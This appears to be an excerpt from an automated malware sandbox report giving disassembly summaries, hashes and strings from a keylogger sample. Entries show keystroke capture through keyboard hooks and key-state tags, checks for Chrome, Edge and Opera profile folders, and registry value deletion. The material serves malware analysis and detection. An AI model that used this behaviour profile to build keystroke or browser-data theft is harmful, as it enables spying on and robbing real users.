                        • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: alarm.wav$x(G
                        • API String ID: 1174141254-2413638199
                        • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                        • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                        • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                        • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                        APIs
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • CloseHandle.KERNEL32(?), ref: 00409FFD
                        • UnhookWindowsHookEx.USER32 ref: 0040A010
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                        • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                        • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                        • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                        • API String ID: 1174141254-2800177040
                        • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                        • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                        • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                        • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                        • API String ID: 1174141254-4188645398
                        • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                        • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                        • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                        • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: AppData$\Opera Software\Opera Stable\
                        • API String ID: 1174141254-1629609700
                        • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                        • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                        • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                        • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040A597
                          • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                          • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                          • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                          • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                          • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                          • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                        • String ID: [AltL]$[AltR]
                        • API String ID: 3195419117-2658077756
                        • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                        • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                        • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                        • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040A5F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                        • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                        • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                        • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: 6h@
                        • API String ID: 2654517830-73392143
                        • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                        • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                        • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                        • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                        • GetLastError.KERNEL32 ref: 0043B4E9
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                        • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                        • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                        • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                        • SetLastError.KERNEL32(0000007F), ref: 004106DF
                        • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastRead
                        • String ID:
                        • API String ID: 4100373531-0
                        • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                        • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                        • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                        • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19